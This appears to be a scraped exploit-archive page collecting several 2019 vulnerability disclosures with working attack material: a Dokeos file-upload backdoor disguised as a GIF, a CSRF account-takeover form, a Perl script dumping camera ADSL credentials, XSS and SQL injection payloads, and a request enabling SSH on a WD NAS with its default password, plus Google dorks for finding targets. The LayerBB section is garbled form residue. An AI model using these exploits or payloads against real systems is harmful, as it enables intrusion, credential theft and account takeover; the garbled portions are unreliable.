Dokeos versions 1.8.6.1 and 1.8.6.3 suffer from a remote file upload vulnerability via an fckeditor.

MD5 | cccfa27ec741adad16c37ee8e387648a

# Exploit Title: Dokeos 1.8.6.3 and 1.8.6.1- Arbitrary File Upload
# Google Dork: "Plateforme Dokeos 1.8.6.3 " or 1.8.6.1
# Date: 17/09/2019
# Exploit Author: Sohel Yousef Jellyfish security team
# Vendor Homepage: https://www.dokeos.com/
# Software Link: https://www.dokeos.com/
# Version: 1.8.6.3 - 1.8.6.1
# Tested on: kali linux
# CVE : N/A

# go to this dir to upload your file dokeos
1.8.6.3/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
# you can insert and upload files rename your file to bel like
backdoor.php.gif
# and add this GIF89;aGIF89;aGIF89;a before <?PHP
# to be like this for examlple

GIF89;aGIF89;aGIF89;a

PHP Test






<?php echo '

FILE UPLOAD


';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "
TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "
FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "
file exists, try with another name"; }
else {
echo "
STARTING UPLOAD PROCESS
";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "
File UPLOADED:- ".$tgt_file; }

else { echo "
ERROR WHILE UPLOADING FILE
"; }
}
}
?>



# upload the file and you can find your file here on this image browser
main/inc/lib/fckeditor/editor/plugins/ImageManager/images.php
# click and view the image / file you and will be here --->
dokeos/main/upload/users/0/my_files/.thumbs/.yourfile.php.gif
# remove .thumbs. to be like this
/main/upload/users/0/my_files/yourfile.php.gif
# and your file are ready
################################################################################################

Source

The user profile dashboard for paloaltonetworks.com suffered from a cross site request forgery vulnerability.

MD5 | 033bda102cbe55a0017caf9a1b421ed3

** Note : this vulnerability is already fixed by paloalto security team

# Exploit Title: Missing CSRF Token Leads to account full takeover (All
accounts can be hijacked)
# Google Dork: [N/A]
# Date: [JUl 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage:https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE : [N/A]
# Acknowledgement:
https://www.paloaltonetworks.com/security-researcher-acknowledgement

summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they're currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request.

Steps to generate
----------------------
>> Initially account should be authenticated

>> for testing purpose i changed email address ..and account was fully
takeover

if html files not works then follow this steps

>> go to profile setting

>> change your profile details

>> then intercept that request

>> then generate csrf poc and then try in browser..boom! account
cresdentials will be changed .


PoC
---




history.pushState('', '', '/')
<form action="
https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp"
method="POST">

<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7"
/>


<input type="hidden" name="capture_transactionId"
value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />


<input type="hidden" name="client_id"
value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
<input type="hidden" name="redirect_uri"
value="http://localhost/" />

<input type="hidden" name="flow_version"
value="20190502085125375950" />




<input type="hidden" name="First_Name__c"
value="EMAIL_HIJACKED" />



<input type="hidden" name="Email_Display_Name"
value="hpankajjj" />
<input type="hidden" name="Business_Email"
value="pankajTESTHIJACKED@yopmail.com" />





<input type="hidden" name="Job_Role__c"
value="Administrator" />






<input type="hidden" name="Alt_State_Province__c"
value="" />








<input type="hidden" name="DataCenterVirtualization_hidden"
value="" />





<input type="hidden" name="NextGenerationFirewall_hidden"
value="" />


<input type="hidden"
name="subscribeToNewsAndProductUpdates_hidden" value="" />
<input type="hidden" name="subscribeToEventsAndWebinars_hidden"
value="" />
<input type="hidden"
name="subscribeToUnit42ThreatResearch_hidden" value="" />











THANK YOU

PANKAJ KUMAR THAKUR

INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK
Inc | OSCP

Source

Hisilicon HiIpcam V100R003 suffers from a remote credential disclosure vulnerability.

MD5 | a331e0a4a6311b41063fcdc8715612bb

#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "33[2J"; #clear the screen
print "33[0;0H"; #jump to 0,0

my $banner = "x5bx20x0ax5bx20x48x69x73x69x6cx69x63x6fx6ex20x48x69x49x70x63x61x6dx20x56x31x30x30x52x30x30x33x20x52x65x6dx6fx74x65x20x41x44x53x4cx20x43x72x65x64x65x6ex74x69x61x6cx73x20x44x69x73x63x6cx6fx73x75x72x65x0ax5bx20x3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx3dx0ax5bx20x45x78x70x6cx6fx69x74x20x41x75x74x68x6fx72x3ax20x54x6fx64x6fx72x20x44x6fx6ex65x76x20x32x30x31x39x20x3cx74x6fx64x6fx72x2ex64x6fx6ex65x76x40x67x6dx61x69x6cx2ex63x6fx6dx3ex0ax5bx0ax5bx20x20x44x69x73x63x6cx61x69x6dx65x72x3ax0ax5bx20x20x54x68x69x73x20x6fx72x20x70x72x65x76x69x6fx75x73x20x70x72x6fx67x72x61x6dx73x20x61x72x65x20x66x6fx72x20x45x64x75x63x61x74x69x6fx6ex61x6cx20x70x75x72x70x6fx73x65x0ax5bx20x20x4fx4ex4cx59x2ex20x44x6fx20x6ex6fx74x20x75x73x65x20x69x74x20x77x69x74x68x6fx75x74x20x70x65x72x6dx69x73x73x69x6fx6ex2ex20x54x68x65x20x75x73x75x61x6cx20x0ax5bx20x20x64x69x73x63x6cx61x69x6dx65x72x20x61x70x70x6cx69x65x73x2cx20x65x73x70x65x63x69x61x6cx6cx79x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x0ax5bx20x20x69x73x20x6ex6fx74x20x6cx69x61x62x6cx65x20x66x6fx72x20x61x6ex79x20x64x61x6dx61x67x65x73x20x63x61x75x73x65x64x20x62x79x20x64x69x72x65x63x74x20x6fx72x20x0ax5bx20x20x69x6ex64x69x72x65x63x74x20x75x73x65x20x6fx66x20x74x68x65x20x20x69x6ex66x6fx72x6dx61x74x69x6fx6ex20x6fx72x20x66x75x6ex63x74x69x6fx6ex61x6cx69x74x79x20x70x72x6fx76x69x64x65x64x0ax5bx20x20x62x79x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x2ex20x54x68x65x20x61x75x74x68x6fx72x20x6fx72x20x61x6ex79x20x49x6ex74x65x72x6ex65x74x20x70x72x6fx76x69x64x65x72x20x0ax5bx20x20x62x65x61x72x73x20x4ex4fx20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x20x66x6fx72x20x63x6fx6ex74x65x6ex74x20x6fx72x20x6dx69x73x75x73x65x20x6fx66x20x74x68x65x73x65x20x0ax5bx20x20x70x72x6fx67x72x61x6dx73x20x6fx72x20x61x6ex79x20x64x65x72x69x76x61x74x69x76x65x73x20x74x68x65x72x65x6fx66x2ex20x42x79x20x75x73x69x6ex67x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x20x0ax5bx20x20x79x6fx75x20x61x63x63x65x70x74x20x74x68x65x20x66x61x63x74x20x74x68x61x74x20x61x6ex79x20x64x61x6dx61x67x65x20x28x64x61x74x61x6cx6fx73x73x2cx20x73x79x73x74x65x6dx20x63x72x61x73x68x2cx20x0ax5bx20x20x73x79x73x74x65x6dx20x63x6fx6dx70x72x6fx6dx69x73x65x2cx20x65x74x63x2ex29x20x63x61x75x73x65x64x20x62x79x20x74x68x65x20x75x73x65x20x20x6fx66x20x74x68x65x73x65x20x70x72x6fx67x72x61x6dx73x0ax5bx20x20x61x72x65x20x6ex6fx74x20x54x6fx64x6fx72x20x44x6fx6ex65x76x27x73x20x72x65x73x70x6fx6ex73x69x62x69x6cx69x74x79x2ex0ax5bx20x20x20x0ax5bx20x55x73x65x20x74x68x65x6dx20x61x74x20x79x6fx75x72x20x6fx77x6ex20x72x69x73x6bx21x0ax5bx0a";

print $banner;

print "[ e.g. perl $0 https://target:port/n" and exit if ($host !~ m/^http/);
print "[ Initializing the browsern";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/

Index of /cgi-bin/

/)){
print "[ The target is vulnerablen";
print "[n[ Directory Traversaln";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "n" for @files;
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[n[ File Readingn";
print "[ ", $_, "n" for split(/n/,$response->content());

} else {
print "[ Exploit failed! The target isn't vulnerablen";
exit;
}

Source

LayerBB version 1.1.3 suffers from a cross site request forgery vulnerability.

MD5 | b599fecb0f9a19d1ceb90b55d70b84bc

# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
# Date: 4/7/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-16531


1. Description:
LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.


2. Proof of Concepts:













view_forum
create_thread
reply_thread
access_moderation
access_administration



This Usergroup is staff.


















Do Not Change

Active

Disabled






Dont Change
UserBannedModeratorAdministrator

















Guest
User
Banned
Moderator
Administrator
















First Category










Guest
User
Banned
Moderator
Administrator

Each Line is a new label. HTML enabled.




































English






HTML tags will be converted into ascii codes. Hyperlinks are not supported!




HTML tags will be converted into ascii codes.







Use reCaptcha








































Category Order Controls

test cat

test cat









First Category

First category on this forum!









Use ENTER to save catagory order




















Node Order Controls

First Node

The first node on this forum

Sub-Forums:









Use ENTER to save catagory order































Current - Do Not Change
Yes
No





















User
Banned
Moderator
Administrator
















First Category    -First Node











User
Banned
Moderator
Administrator

Each Line is a new label. HTML enabled.














view_forum
create_thread
reply_thread
access_moderation
access_administration



This Usergroup is staff.































Current - Do Not Change
Primary
Success
Info
Warning
Danger
















































Add an answer field









































Not telling
Female
Male

(UTC-11:00) Midway Island(UTC-11:00) Samoa(UTC-10:00) Hawaii(UTC-09:00) Alaska(UTC-08:00) Pacific Time (US & Canada)(UTC-08:00) Tijuana(UTC-07:00) Arizona(UTC-07:00) Chihuahua(UTC-07:00) La Paz(UTC-07:00) Mazatlan(UTC-07:00) Mountain Time (US & Canada)(UTC-06:00) Central America(UTC-06:00) Central Time (US & Canada)(UTC-06:00) Guadalajara(UTC-06:00) Mexico City(UTC-06:00) Monterrey(UTC-06:00) Saskatchewan(UTC-05:00) Bogota(UTC-05:00) Eastern Time (US & Canada)(UTC-05:00) Indiana (East)(UTC-05:00) Lima(UTC-05:00) Quito(UTC-04:00) Atlantic Time (Canada)(UTC-04:30) Caracas(UTC-04:00) La Paz(UTC-04:00) Santiago(UTC-03:30) Newfoundland(UTC-03:00) Brasilia(UTC-03:00) Buenos Aires(UTC-03:00) Georgetown(UTC-03:00) Greenland(UTC-02:00) Mid-Atlantic(UTC-01:00) Azores(UTC-01:00) Cape Verde Is.(UTC+00:00) Casablanca(UTC+00:00) Edinburgh(UTC+00:00) Greenwich Mean Time : Dublin(UTC+00:00) Lisbon(UTC+00:00) London(UTC+00:00) Monrovia(UTC+00:00) UTC(UTC+01:00) Amsterdam(UTC+01:00) Belgrade(UTC+01:00) Berlin(UTC+01:00) Bern(UTC+01:00) Bratislava(UTC+01:00) Brussels(UTC+01:00) Budapest(UTC+01:00) Copenhagen(UTC+01:00) Ljubljana(UTC+01:00) Madrid(UTC+01:00) Paris(UTC+01:00) Prague(UTC+01:00) Rome(UTC+01:00) Sarajevo(UTC+01:00) Skopje(UTC+01:00) Stockholm(UTC+01:00) Vienna(UTC+01:00) Warsaw(UTC+01:00) West Central Africa(UTC+01:00) Zagreb(UTC+02:00) Athens(UTC+02:00) Bucharest(UTC+02:00) Cairo<option value="Africa/H



Nothing selectedAndorraUnited Arab EmiratesAfghanistanAntigua and BarbudaAnguillaAlbaniaArmeniaAngolaAntarcticaArgentinaAmerican SamoaAustriaAustraliaArubaAland IslandsAzerbaijanBosnia and HerzegovinaBarbadosBangladeshBelgiumBurkina FasoBulgariaBahrainBurundiBeninSaint BarthélemyBermudaBrunei DarussalamBoliviaBonaireBrazilBahamasBhutanBouvet IslandBotswanaBelarusBelizeCanadaCocos IslandsCongo (the Democratic Republic)Central African RepublicCongoSwitzerlandCote d'IvoireCook IslandsChileCameroonChinaColombiaCosta RicaCubaCabo VerdeCuracaoChristmas IslandCyprusCzech RepublicGermanyDjiboutiDenmarkDominicaDominican RepublicAlgeriaEcuadorEstoniaEgyptWestern SaharaEritreaSpainEthiopiaFinlandFijiFalkland IslandsMicronesiaFaroe IslandsFranceGabonUnited KingdomGrenadaGeorgiaFrench GuianaGuernseyGhanaGibraltarGreenlandGambiaGuineaGuadeloupeEquatorial GuineaGreeceSouth Georgia and the South Sandwich IslandsGuatemalaGuamGuinea-BissauGuyanaHong KongHeard Island and McDonald IslandsHondurasCroatiaHaitiHungaryIndonesiaIrelandIsraelIsle of ManIndia<option value="I




In the format of: YYYY-MM-DD






Additional Profile Fields





































































LayerBB Captcha





By clicking "Register", you agree to abide by the forum rules located here.





3. Solution:
Update to 1.1.4

Source

GOautodial version 4.0 suffers from a persistent cross site scripting vulnerability in the CreateEvent flow.

MD5 | 06e513908ec4cf29eb4b367076db6e10

# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2019-09-19
# Vendor Homepage: https://goautodial.org/
# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
# Tested Version: 4.0
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Simple XSS attack after application authentication.

# POST Request

POST /php/CreateEvent.php HTTP/1.1
Host: 10.0.0.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.25/events.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
Connection: close
DNT: 1

title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

Source

DIGIT CENTRIS 4 ERP suffers from a remote SQL injection vulnerability.

MD5 | 66111e2cb97a8f518d8d693b7be8b05d

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID

# [POST REQUEST]

POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

Source

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).

MD5 | d5e290d2a09d4225693cebc37a83097f

Source

Western Digital My Book World II NAS versions 1.02.12 and below have a hard-coded ssh credential that allows for remote command execution.

MD5 | 3808a885298919e8f753b294c96ace56

# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
# Google Dork: intitle:"My Book World Edition - MyBookWorld"
# Date: 19th Sep, 2019
# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
# Vendor Homepage: https://wd.com/
# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
# Version: <= 1.02.12
# Tested on: Firmware
# CVE : CVE-2019-16399
POST /admin/system_advanced.php?lang=en HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 241
orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh¤t_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
/*
The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware.
*/
Security Researcher - Noman Riffat, National Security Services Group (NSSG)
@nomanriffat, @nssgoman

Source

macOS version 18.7.0 kernel local privilege escalation exploit that may only work on Macs before 2016.

MD5 | 8157e1ede5cfd34c7e3aa2019494c8bb

Source

Hospital-Management version 1.26 suffers from a remote SQL injection vulnerability.

MD5 | b3bc4b70753666ea3c77040cafd689b7

# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Simple SQL injection after application authentication.

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:

fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:

fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

Source